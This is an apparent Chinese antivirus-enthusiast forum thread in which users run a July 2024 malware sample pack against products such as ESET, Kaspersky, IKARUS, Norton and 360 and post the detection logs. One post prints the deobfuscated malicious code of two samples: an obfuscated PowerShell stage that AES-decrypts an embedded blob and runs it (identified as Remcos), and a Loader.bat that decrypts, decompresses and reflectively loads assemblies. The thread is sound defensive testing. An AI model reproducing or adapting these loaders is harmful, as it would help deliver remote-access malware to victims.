【开放测试】卡饭病毒样本包 20240712 第143期

LastF1ame_

eset测试
剩下4个样本。

然后触发elg送走两个



还剩下2个，换地方双击



应该是无了

筑梦

我也来下   要回复  非灌水
----
离了个大谱，火绒 0   我打开方式不对？

DisaPDB

00006666 发表于 2024-7-12 18:57
看这个测试，没开核晶怎么好像也可以拦一些注入

@DisaPDB

拦截远程线程注入其实不需要核晶
在LPTHREAD_START_ROUTINE，LPVOID，LPSECURITY_ATTRIBUTES之类的地方挂回调就可以了

GreatMOLA

Deep Instinct
扫描 12x

Action	Threat Type	Details
Prevented	PUA - Generic PUA	C:\Users\User1211\Desktop\infected2024071201\Download\2c778d65ff3ddb44732faf...c48675dca9439e97.dll
Prevented	Malware - Dropper	C:\Users\User1211\Desktop\infected2024071201\Download\0040de802062e7a83c6f785...c3274fdce08b6a6c1.lnk
Prevented	Malware - Trojan	C:\Users\User1211\Desktop\infected2024071201\Download\ss.exe
Prevented	Malware - Trojan	C:\Users\User1211\Desktop\infected2024071201\Download\04.exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\infected2024071201\Download\vNrcPvMYLZmn2cc.exe
Prevented	Malware - Trojan	C:\Users\User1211\Desktop\infected2024071201\Download\Purchase  order(600010310,10303).exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\infected2024071201\Download\inquiry  for AP-103- FM-2400 project.exe
Prevented	Malware - Dropper	C:\Users\User1211\Desktop\infected2024071201\Download\QUOTATION_JULQTRA071244煤PDF.scr.exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\infected2024071201\Download\IT01879020517_uGIim_xml路pdf.exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\infected2024071201\Download\PO#76215720223.exe
Prevented	Malware - Dropper	C:\Users\User1211\Desktop\infected2024071201\Download\doc20240712-00041.exe
Prevented	Malware - Ransomware	C:\Users\User1211\Desktop\infected2024071201\Download\CATALOGUE.exe

执行

19c968f716107aea4fb7bf7fdeb9f8821b4aa1ea8593137a08322356c80460cd.vbs



147e7953d3b54a9e8367d9e9670a4a182824f56cf30d35a315799a1953e5cdb1.vbs



732a6bf2345e9cc40b9a6a1164dc2e823955cbc56a5d3750e675d1c4db7f7415.lnk



02072024_1624_02072024_NUMER FAKTURY PILNIE WYMAGANY 240702.vbs



aa012e5b757959f95b14b9866f36c49335096a95b4f058ee9a85b6552a0e168d.vbs



crosscheckrosefloweronhairbeauty.vbs

miss

1. powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53289677559390085198936330541601CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIfBvRZYArRiXxb9pLfOWJSzhLRPd5I7zACTsYJPbnDRxmpMjLudBMxIclsh5G1oAEB4NHw+gqZ73NYAtRuPEZbun7w27uHNUU/2UZk0vwixZZjYF8SBUg7cmFK0nSMgU1Iow3bYmuii7NK55sdrSb83T7TlGZY91+Moz0ZBIk/0eAU2wf8Py5IgxbPrmhkNHTpbZFW/Al0eMV2MWxPeHSmQgZ//aQ5gn4Og/LInIlaSIqzqvxWq5kou0WIQo/72zG6+7hFvlR6cDOFO2EYak1CZ8irRCX18qAZvDaSJk/li/7cM0YyGDGjetxHvddCjxoFrsIzOoFr80ro7ty8kqQMtvLfXWiRbyxHtkF3NxaNwlxDUG/Htly5mpzTXN98K6Fnob44pHV6WFmrTRzBeXFvRMXFrkrC3t4BnQoCxsRB6x1sycYX2BAgD4vDPPYxPb47dSqUAoFV4NMTMVwtucrwLJdlZlPd2EnjstlapgPGyqeDuq+TKGWTRY7Z1C3vRcmlGe+lnY3QnpSNHNLl/haCmRsH4gMWyr4W/C2zNKguYI0N/PuyhAYi7YLD4A/NHjUcCY9rhxCg197+PLu/OwLBOl0CXgp/Ts85zFpV7WYNvBVPdgWvIPMkzBwQ+49ILJWVxcCDdE6JmR5Fq9tx9CQCnQJHN8uHPYaUlZ0ReVI/npl7GN05N9Obi18FtHe8U5TJh3++s3GfoiYW9BhKgh39janXG8zoXy6iZOVv1CDPHimFt85ZaMs1Bo+CmL5lnsudxNiDoq44/2E5DtzNoWEzZ+OQLsOM9Zh7Lke8w81xDJOSxVmqDoOcMa4I6/NsXFAlOTeKkhDmJCHTUB/Ks2qy+xvWMe77WJAkO37XgYyBUTA46+w+NVfiXxSstunWVvAjPztuMG9ekqgyxG0tWnqnXcuN/TQwZP47Z83ALuTurZOTykuQEXA42lNWU8mibH2upcIACt8NoPw3r5fRNvJc322KLiLSEJOJDDwYQP3uPDW9ylYqnz9saWGUF7wyvlEIrk5vKGo+vuncoCtLyjSFU2NNWq/OUhm3YFstmHb00qRls8jshNFDeskT+9HrCwRd5P+6kLq2cCc1OCMU4SwDWZMZEi/L5oEW5wJXHXG/5VBwshKqSiAF1ojathm5reHGj8cBBQcmfmNAiBhE+cYjLiJ1HYdwmhWRlD9k2l7IrpPf72Zqiu2AJE1o7WKFUPAGFRCXzrDrRaHWxr27DK2NG8lOEVbh92cuVyNGBlhPQft0FbKGvaWYwCm9BS9uJ8iakplRHRpzvLdk5Vw06NR0Yrav4GBiDdk6DqZecDjAKZoBxoCZOav+ztJKIbgKzOMNv18CX9tBGDWY/69/2jI7bvSx+CwNi/hpj3s9iK+SwzIrpD+dFAIiQcmP3Wj4TFZaBEjn++UcwcO3C2sjME5q86SXNGxzQs3i74Hw5uxEiiJhjft+JA0nP2X91n118uUxgEZdNZYtfDuLLg3uLun/EmKv1DFelh7eFXGEr3moW6nDkt16Q8Vt70kfULUet/WDc5XMsIOU0QFo5WQP9BPNJm7vuhbMBlWp/x8tkFjKO9fCUtgZ3vYKrjvFe1RMsHOuSXcC8eZgwJNI3F0Gtx7Rc2jC2D+CDFPstFXOPDalI6g2hOKB0IzlYPk/GhbZmfoYqm2SfR4VcsG9fjYrUCGhbqag/5m5K5GGlkwdugJl/F/liXwGNmURs4EWFJe3UpAevGgVLpYHIc48Xsqfyu4AfxXZtVkyJXoIc1AzQvH1cvQJm9XokY4SbLS7N7PiDJXCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe  ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34  -cRePLACe  e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion')  -CREplacE  'e4j',[Char]39  -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')

复制代码

远程下载：

鉴定为 Remcos.

I-MY-5323785035-D03395124_20240711081006.vbs



Loader.bat

1. //Payload
   
2. 
   
3. powershell function decrypt_function$param_var{        $aes_var=[System.Security.Cryptography.Aes]::Create;        $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;        $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;        $aes_var.Key=[System.Convert]::gnirtS46esaBmorF[-1..-16] -join rP6ipY8ykCrcY/vqOWugxQ2mrpqqQx5JkOzMlDOKmOA=;        $aes_var.IV=[System.Convert]::gnirtS46esaBmorF[-1..-16] -join GH3abWd9uo3DMEDckKzwyw==;        $decryptor_var=$aes_var.CreateDecryptor;        $return_var=$decryptor_var.TransformFinalBlock$param_var, 0, $param_var.Length;        $decryptor_var.Dispose;        $aes_var.Dispose;        $return_var;}function decompress_function$param_var{        $BZojv=New-Object System.IO.MemoryStream,$param_var;        $jqKwU=New-Object System.IO.MemoryStream;        $YBFLc=New-Object System.IO.Compression.GZipStream$BZojv, [IO.Compression.CompressionMode]::Decompress;        $YBFLc.CopyTo$jqKwU;        $YBFLc.Dispose;        $BZojv.Dispose;        $jqKwU.Dispose;        $jqKwU.ToArray;}function execute_function$param_var,$param2_var{        $HnXah=[System.Reflection.Assembly]::daoL[-1..-4] -join [byte[]]$param_var;        $ASDSB=$HnXah.EntryPoint;        $ASDSB.Invoke$null, $param2_var;}$HxmrU = C:\Users\User1211\Desktop\infected2024071201\Download\Loader.bat;$host.UI.RawUI.WindowTitle = $HxmrU;$YminX=[System.IO.File]::txeTllAdaeR[-1..-11] -join $HxmrU.Split[Environment]::NewLine;foreach $LBczd in $YminX {        if $LBczd.StartsWithzyIAYTpLJuqqlwNwSYZB        {                $nGVNd=$LBczd.Substring20;                break;        }}$payloads_var=[string[]]$nGVNd.Split\;$payload1_var=decompress_function decrypt_function [Convert]::gnirtS46esaBmorF[-1..-16] -join $payloads_var[0].Replace#, /.Replace@, A;$payload2_var=decompress_function decrypt_function [Convert]::gnirtS46esaBmorF[-1..-16] -join $payloads_var[1].Replace#, /.Replace@, A;execute_function $payload1_var $null;execute_function $payload2_var ,[string[]] ;

复制代码

Update.ps1

anxiety520

QVM360 发表于 2024-7-12 17:58
Kaspersky

剩余

KSN已拉黑:
2c778d65ff3ddb44732faf2be85ca0205667be3d87ac14acc48675dca9439e97.dll  -UDS:Trojan-Dropper.Win64.Agent.a
.bat和.ps1 opentip均有多项检测名 但暂未下放紧急检测系统

孤勇者

anxiety520 发表于 2024-7-12 19:59
正在上报给卡巴, 大概明日午前会有结果

KSN已拉黑:

我已经上报过了

Nocria

Norton V24 - 18/21



————————————————————

IKARUS - 18/21

1. [12.07.2024 20:13:24] On-demand scan started: "TemporaryScan {a39a5454-a251-4cfd-9c9c-ce1b7beb2872}"
   
2. [12.07.2024 20:13:24] Found, 0.00s, SigName: "Trojan-Downloader.VBS.Agent", SigId: 5532354, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\02072024_1624_02072024_NUMER FAKTURY PILNIE WYMAGANY 240702.vbs"
   
3. [12.07.2024 20:13:24] Found, 0.00s, SigName: "Trojan.LNK.Agent", SigId: 501411650, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1.lnk"
   
4. [12.07.2024 20:13:24] Found, 0.01s, SigName: "Trojan-Downloader.VBS.Agent", SigId: 5532354, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\147e7953d3b54a9e8367d9e9670a4a182824f56cf30d35a315799a1953e5cdb1.vbs"
   
5. [12.07.2024 20:13:24] Found, 0.01s, SigName: "Trojan-Downloader.VBS.Agent", SigId: 5532354, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\19c968f716107aea4fb7bf7fdeb9f8821b4aa1ea8593137a08322356c80460cd.vbs"
   
6. [12.07.2024 20:13:24] Found, 0.01s, SigName: "Trojan-Dropper.LNK.Agent", SigId: 501156541, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\732a6bf2345e9cc40b9a6a1164dc2e823955cbc56a5d3750e675d1c4db7f7415.lnk"
   
7. [12.07.2024 20:13:24] Found, 0.01s, SigName: "Win32.SuspectCrc", SigId: 501429053, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\CATALOGUE.exe"
   
8. [12.07.2024 20:13:24] Found, 0.03s, SigName: "Trojan-Downloader.VBS.Agent", SigId: 5532354, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\aa012e5b757959f95b14b9866f36c49335096a95b4f058ee9a85b6552a0e168d.vbs"
   
9. [12.07.2024 20:13:24] Found, 0.01s, SigName: "Win32.SuspectCrc", SigId: 501430125, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\doc20240712-00041.exe"
   
10. [12.07.2024 20:13:24] Found, 0.01s, SigName: "Trojan-Downloader.VBS.Agent", SigId: 5541567, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\I-MY-5323785035-D03395124_20240711081006.vbs"
    
11. [12.07.2024 20:13:24] Found, 0.02s, SigName: "Win32.SuspectCrc", SigId: 501430127, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\inquiry for AP-103- FM-2400 project.exe"
    
12. [12.07.2024 20:13:24] Found, 0.02s, SigName: "Trojan.BAT.Alien", SigId: 501342011, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\Loader.bat"
    
13. [12.07.2024 20:13:24] Found, 0.06s, SigName: "Trojan.NSIS.Injector", SigId: 5537952, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\IT01879020517_uGIim_xml·pdf.ex"
    
14. [12.07.2024 20:13:25] Found, 0.07s, SigName: "Trojan.Win32.Meterpreter", SigId: 5241854, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\Purchase order(600010310,10303).exe"
    
15. [12.07.2024 20:13:25] Found, 0.21s, SigName: "Trojan.Autoit", SigId: 5489483, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\04.exe"
    
16. [12.07.2024 20:13:25] Found, 0.17s, SigName: "Trojan.Autoit", SigId: 5489483, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\PO#76215720223.exe"
    
17. [12.07.2024 20:13:25] Found, 0.09s, SigName: "Trojan.MSIL.Injector", SigId: 4993917, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\update.ps1"
    
18. [12.07.2024 20:13:25] Found, 0.04s, SigName: "Trojan.MSIL.Inject", SigId: 5540281, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\vNrcPvMYLZmn2cc.exe"
    
19. [12.07.2024 20:13:25] Found, 0.13s, SigName: "Trojan.Autoit", SigId: 5489483, Type: "VIRUS", File: "C:\Users\promi\Desktop\infected2024071201\Download\ss.exe"
    
20. [12.07.2024 20:13:25] On-demand scan FINISHED: "TemporaryScan {a39a5454-a251-4cfd-9c9c-ce1b7beb2872}"
    
21. [12.07.2024 20:13:25] ----------------------------------------------------
    
22. [12.07.2024 20:13:25] Directories scanned: 2
    
23. [12.07.2024 20:13:25] Files scanned: 21
    
24. [12.07.2024 20:13:25] Virus found: 18
    
25. [12.07.2024 20:13:25] ----------------------------------------------------

复制代码

胖墩蚂蚁

V22扫描剩余10


360扫描剩余4



McAfee修复1


瑞星内核杀1



剩余2个0kb的尸体



算不算清空

syswow64

BD

扫描剩7个

双击：
云杀2个，一个dll没跑，其它全部ATD杀

胖墩蚂蚁

Nocria 发表于 2024-7-12 20:09
Norton V24 - 18/21

V22只能扫除11个  V24那么厉害


@驭龙  为什么偏爱22